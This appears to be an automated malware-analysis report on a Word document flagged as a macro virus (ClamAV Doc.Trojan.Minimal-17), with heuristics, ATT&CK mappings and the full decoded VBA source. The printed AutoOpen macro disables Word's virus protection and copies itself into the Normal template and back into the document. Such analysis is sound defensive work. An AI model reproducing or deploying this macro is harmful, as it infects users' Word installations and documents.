MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro attempts to copy itself to the Normal template and then back to the active document, indicating an attempt to establish persistence or prepare for further execution. The presence of legacy WordBasic markers and the ClamAV detection further support its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.Minimal-17 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Minimal-17
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1573 bytes |
SHA-256: 46aefc82bac28a434752cf1b416839843e31cd66f3d4766a197d676e0acd39ca |
|||
|
Detection
ClamAV:
Doc.Trojan.Minimal-17
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "small" Sub AutoOpen(): On Error Resume Next: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: a = ActiveDocument.FullName: n = NormalTemplate.FullName Application.OrganizerCopy Source:=a, Destination:=n, Name:="small", Object:=wdOrganizerObjectProjectItems: NormalTemplate.Save Application.OrganizerCopy Source:=n, Destination:=a, Name:="small", Object:=wdOrganizerObjectProjectItems: ActiveDocument.Save End Sub ' ' MMM MMMMMMMMM MM ' MMMMMMMM MMMMMMMMMMMMMMMM MMMMMM ' MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM ' MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM ' MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ' MMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ' MMM MMMMMMMMMMMMM MMMMMMMMMM ' MMM MMMMMMMMMMM RUSSIA MMMMMMMM ' MM MMMMMMMM M MMMMMMM ' MM MMMMMMMMM MMM MMMMMM ' MMMMMMMMMMMMMM MMMMM MMMMMM ' MM MMMMMMMMMMMMMMMMMMMMMMMM MMMM ' MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMM ' MMMMMMMMMM MM |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.